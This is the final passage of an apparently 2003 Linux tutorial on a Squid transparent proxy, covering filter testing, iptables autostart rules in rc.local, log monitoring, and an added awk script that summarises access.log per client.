2. If http://www.17tahun.com does not open and only shows ACCESS DENIED, your Porn Filter is working properly. You can add more sites that you want to block by editing porn.txt again
[root@PROXY hanny]# vi /usr/local/squid/etc/porn.txt

3. If http://zdads.e-media.com does not open and only shows a BLOCKED AREA image, your Banner Filter is working properly.


Autostarting Squid and the Transparent Proxy
If the Squid server is restarted and we do not want to repeat the commands from the article above, put the script in /etc/rc.local:
[root@PROXY hanny]# vi /etc/rc.local

fill it with:
#Run the transparent proxy
/sbin/iptables -F -t nat
/sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp -s 192.168.0.0/255.255.255.0 --dport 80 -j DNAT --to 192.168.0.1:8080

#Start Squid
/bin/rm /usr/local/squid/var/logs/squid.pid
/usr/local/squid/sbin/squid


6. Miscellaneous
If we want to see who is currently using our Squid and which sites they open, you can use:
[root@PROXY hanny]# tail -f /usr/local/squid/var/logs/access.log
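
An added example (not from the original tutorial): instead of watching the raw stream, access.log can be summarised per client, including how many requests the ACLs refused (TCP_DENIED). The log lines are constructed samples in Squid's native access.log format, and the function names are illustrative.

```bash
#!/bin/bash
# Constructed sample lines in Squid's native access.log format:
# time elapsed client result/status bytes method URL ident hierarchy type
SAMPLE_LOG='1048500001.120    210 192.168.0.2 TCP_MISS/200 18234 GET http://www.yahoo.com/ - DIRECT/203.0.113.10 text/html
1048500002.450      3 192.168.0.2 TCP_DENIED/403 1420 GET http://www.17tahun.com/ - NONE/- text/html
1048500003.010     95 192.168.0.3 TCP_HIT/200 5120 GET http://www.yahoo.com/logo.gif - NONE/- image/gif
1048500004.700      2 192.168.0.2 TCP_DENIED/403 1420 GET http://www.17tahun.com/index.html - NONE/- text/html
1048500005.330    880 192.168.0.3 TCP_MISS/200 150000 GET http://downloads.example.com/tool.exe - DIRECT/203.0.113.20 application/octet-stream'

# summarize_access: read access.log lines on stdin and print one line per
# client with its request count, denied count and bytes delivered.
summarize_access() {
    awk '
        NF < 7 { next }                    # skip truncated or empty lines
        {
            split($4, res, "/")            # TCP_DENIED/403 -> TCP_DENIED
            reqs[$3]++
            bytes[$3] += $5
            if (res[1] == "TCP_DENIED") denied[$3]++
        }
        END {
            for (c in reqs)
                printf "%s requests=%d denied=%d bytes=%d\n",
                       c, reqs[c], denied[c], bytes[c]
        }' | sort
}

# denied_requests: print "client URL" for every request the ACLs refused.
denied_requests() {
    awk 'NF >= 7 && $4 ~ /^TCP_DENIED\// { print $3, $7 }'
}

printf '%s\n' "$SAMPLE_LOG" | summarize_access
printf '%s\n' "$SAMPLE_LOG" | denied_requests
```

On the proxy itself the same functions read the real file, for example: summarize_access < /usr/local/squid/var/logs/access.log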

If you change squid.conf and want to try whether the changed squid.conf works as intended:
[root@PROXY hanny]# /usr/local/squid/sbin/squid -k reconfigure


7. ChangeLog
24 March 2003
Added permission on the cache directory (dani@bisnisweb.com)

24 March 2003
Writing of this tutorial started (hanny@rsds.or.id)


8. References
1. http://www.squid-cache.org/
2. http://www.tldp.org/HOWTO/mini/TransparentProxy.html
3. http://jateng.linux.or.id/index.html
4. http://netfilter.samba.org/
5. http://phroggy.com/bannerfilter/


9. Acknowledgements
1. To asfik, sunar and dani, as the starting point of my Squid installation.
2. To the #indolinux channel on the dal.net and efnet.net servers, as the Linux community.